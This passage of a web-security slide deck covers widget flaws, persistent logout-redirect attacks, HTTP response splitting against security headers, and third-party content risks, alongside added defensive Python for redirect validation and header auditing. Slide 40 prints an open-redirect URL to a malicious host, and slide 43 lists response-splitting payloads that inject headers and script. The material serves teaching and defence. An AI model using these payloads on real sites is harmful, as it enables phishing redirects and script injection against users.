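                target = rel.get("Target", "")
                scheme = urlsplit(target.strip()).scheme.lower()
                if scheme not in ALLOWED_SCHEMES:
                    flagged.append(target)
    return flagged
```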
  • 33. Web Widget Interface Flaws
    What lies beneath?
    Web widget
    - A snippet of HTML code embedded in the website. You can "copy" that code and "embed" it in your web page
    - A gadget is proprietary whereas a widget is freely available
    - Diverse functionalities – advertisements, traffic analysis, news, feeds, etc.
    Web widget code snippets
    - JavaScript
    - Adobe Flash plugins
    - Code for embedding Windows Media Player
    - Silverlight plugins
  • 34. Web Widget Interface Flaws
    Insecurities
    Code specification issues
    - A widget or gadget can be designed insecurely
    - HTTP parameters play a crucial role in its working
    - Arbitrary code execution in the OS – scripting interface
    - Unsanitized, unfiltered, unverified data acceptability
    Interface with websites and triggering vulnerabilities
    - Understanding the design of the widget
    - Widget interface with the primary website and how it works
    - Registered widget and domain names in the database can cause security problems in the base website
  • 35. Web Widget Interface Flaws
    Web widget working layout
    The model looks simplistic in nature.
  • 36. Web Widget Interface Flaws
    Case Study
    Real time issue in one of the most recognized vendors
    – The website is a leading service provider for news and advertisements
    – The widget is allowed to be installed on any custom blog or user website after the registration process. The widget code is changed based on the platform such as Blogger, MySpace etc.
    – Once the registration is done, the widget snippet is provided to the user or customer for inclusion in his/her website
    – Now the content provider has a URL which redirects traffic from the primary website to the registered blog.
    - A very bad design practice.
  • 37. Web Widget Interface Flaws
    Attack scenario
    Details
    » Attacker registers his malicious blog with that content provider
    » Once it is registered, the widget is allowed to be included in the attacker-controlled website
    » Attacker starts using the content provider link to redirect traffic to his blog, making victims vulnerable.
  • 38. Persistent Redirection Attacks
    HTTP Redirection
    - Automated redirection
    - What if the attacker controls it?
    - More effective – if persistent
  • 39. Persistent Redirect Attacks
    Manipulating Logout Module
    Details
    » Enterprise application inbuilt functionality to provide a pre-login parameter for inline redirection back to the application home page while logging out of the application
    » Careful analysis and design scrutinization helps the tester to find parameters which provide a persistent state to set your value
    » The application does not verify the value provided in the redirect variable while logging into the application
    » Another variation of login redirection attacks; this one is logout redirection attacks
    HackintheBox (HITB) EZine – Open Redirect Wreck Off Paper
    http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf
  • 40. Persistent Redirection Attacks
    Manipulating Logout Module
    Layout
    – Vulnerability disclosed to one of the biggest vendors
    – Successfully exploited and triggered in a large number of applications
    https://www.example.com/XXX_YYYY/ret.jsp?_pc=STANDARD_WEB_PAGE_STAT&_pi=1800&kk_home_url=http://www.malicious.org
    – When the above URL is used to log into the application, the value of the kk_home_url variable becomes persisted.
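Both the widget case (slides 36-37) and the kk_home_url case (slides 39-40) are the same defect: a redirect destination taken from a request and trusted verbatim, made worse when it is stored and replayed later. The following is an added example, not the vendor's code: the flawed behaviour beside a validator that accepts only a path on the application's own origin. APP_ORIGIN and DEFAULT_LANDING are placeholders.

```python
from urllib.parse import urlsplit, urlunsplit

# Placeholders for the application's own origin and landing page (assumptions).
APP_ORIGIN = "https://www.example.com"
DEFAULT_LANDING = "/home"


def vulnerable_logout_target(kk_home_url):
    """The flaw on the slides: the value stored at login is trusted verbatim at logout."""
    return kk_home_url or APP_ORIGIN + DEFAULT_LANDING


def safe_logout_target(kk_home_url):
    """Accept only a path on our own origin; anything else falls back to DEFAULT_LANDING.

    Apply this at login (before the value is persisted) and again at logout, so a
    value that slipped into the session store earlier cannot redirect later.
    """
    fallback = APP_ORIGIN + DEFAULT_LANDING
    if not kk_home_url:
        return fallback
    parts = urlsplit(kk_home_url.strip())
    ours = urlsplit(APP_ORIGIN)
    # Absolute and protocol-relative URLs: scheme and host must match exactly,
    # which also rejects "https://www.example.com@evil" (netloc differs).
    if parts.scheme or parts.netloc:
        if parts.scheme.lower() != ours.scheme or parts.netloc.lower() != ours.netloc:
            return fallback
    path = parts.path
    # Reject "//host", "/\host" and backslashes (browsers may treat them as an authority).
    if not path.startswith("/") or path.startswith("//") or "\\" in path:
        return fallback
    return urlunsplit((ours.scheme, ours.netloc, path, parts.query, ""))
```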
  • 41. Declarative Security Manipulation
    Concept
    Operation – Idea
    – The declarative model provides an extensible set of security parameters in the HTTP responses
    – Browsers can respond with a requested security mechanism
    – Declared by the developer as part of the web server or application running on the server. In this way, declarative security can provide both a portable and flexible security defense
    Why declarative security in HTTP response headers
    – ClickJacking attacks
    – XSS filtering issues
    – File downloading security
    – HTML content rendering
  • 42. Declarative Security Manipulation
    HTTP response headers
    - Clickjacking
    – X-FRAME-OPTIONS {SAMEORIGIN / DENY}
      » Don't allow the website to be framed
      » Browser automatically escapes the framing
    – X-XSS-PROTECTION {0 – Disable | 1 – Enable}
      » Triggers inbuilt IE XSS protection
      » Nothing much to say about its insecurity
    – X-CONTENT-TYPE-OPTIONS {NOSNIFF}
      » Preventing script execution through images
      » Secure MIME interpretation
    – X-DOWNLOAD-OPTIONS {NOOPEN}
      » Disallowing opening of files from the internet
    Applied as HTTP response headers – HTTP response splitting attacks work appropriately (%0d%0a)
  • 43. Declarative Security - Study
    Generic attack styles
    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Download-Open:%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Frame-Options:0 [No value]%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Content-Type-Options:[no Value]%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
    Provide any falsified value to bedazzle the real working of a security component in a browser.
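Slides 41-43 make two points a defender needs to check: the four headers must be present with sane values, and any request value echoed into a header must be rejected if it contains CR/LF, because an injected second copy of a header such as X-XSS-Protection:0 overrides the real one. The following is an added example (not from the original slides) with two constructed responses, one correct and one where the server echoed the url parameter unescaped.

```python
from urllib.parse import unquote

EXPECTED_HEADERS = {                     # accepted values, lower-cased
    "x-frame-options": {"deny", "sameorigin"},
    "x-xss-protection": {"1", "1; mode=block"},
    "x-content-type-options": {"nosniff"},
    "x-download-options": {"noopen"},
}

# Constructed sample responses (not captured from any real site).
GOOD_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nX-Frame-Options: DENY\r\n"
    "X-XSS-Protection: 1; mode=block\r\nX-Content-Type-Options: nosniff\r\n"
    "X-Download-Options: noopen\r\n\r\n<html><body>ok</body></html>"
)
# Here the server echoed url=temp1=param1;%0d%0aX-XSS-Protection:0 into Location
# without stripping CR/LF, so an attacker-chosen header lands after the real one.
SPLIT_RESPONSE = (
    "HTTP/1.1 302 Found\r\nX-XSS-Protection: 1\r\n"
    "Location: /tamper.pl?url=temp1=param1;\r\nX-XSS-Protection:0\r\n\r\n"
    "<html><body><script>alert('0wned')</script></body></html>"
)


def parse_headers(raw_response):
    """Map header names to values (lower-cased); a repeated header keeps the last
    value, which is how a splitting attack overrides the legitimate setting."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip().lower()
    return headers


def audit_declarative_security(raw_response):
    """Return {header: 'ok' | 'missing' | 'weak:<value>'} for the four headers."""
    headers = parse_headers(raw_response)
    report = {}
    for name, accepted in EXPECTED_HEADERS.items():
        if name not in headers:
            report[name] = "missing"
        elif headers[name] in accepted:
            report[name] = "ok"
        else:
            report[name] = "weak:" + headers[name]
    return report


def is_splitting_attempt(param_value):
    """True when a value bound for a response header carries CR or LF, raw or URL-encoded."""
    decoded = unquote(param_value)
    return "\r" in decoded or "\n" in decoded
```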
  • 44. Declarative Security - Study
    Feasibility study
    - Implementation of DS in the real world
    - To understand the scenario
    - To understand the adaptability
    - To estimate the risk to websites
    Paper released at USENIX CollSec (Collaborative Methods of Security and Privacy): http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf
  • 45. Declarative Security - Study
    Feasibility study
    - Alexa top 1000 website responses
    - Google's GWS implements the most
  • 46. Content Delivery Networks – Stringency
    Content from third parties
    - Online advertisements
    - Video streaming content
    - Windows Media files (MP4, MP3) / QuickTime
    - Embedded Flash files
    - Inline frames used for rendering contents
    - EMBED / OBJECT / FRAME – HTML/DOM supporting elements
  • 47. Content Delivery Networks – Stringency
    Web 2.0 requirement
  • 48. Content Delivery Networks – Stringency
    - Example – A malicious media player file can infect victims with malware once included from a third party content network
    - Easy to bypass filters
    Setting the Payload
    Payload bypasses the XSS filter and starts downloading an XLS file
  • 49. WWW Vulnerabilities - Circle
    (Cycle diagram with four nodes: Testing and Strengthening, Evolving complex Technology, Efficient Hacks, Complex Flaws)
  • 50. Conclusion
    - Attacks on web infrastructure are increasing
    - More complexity, more problems
    - Security is a process and not a one time shot
    - Design according to requirement
    - Test appropriately
  • 51. Questions and Knowledge Sharing
  • 52. Demonstrations - Available If Required
    Shared on an individual front.
  • 53. Thanks
    OWASP (http://www.owasp.org)
    SecNiche Security (http://www.secniche.org)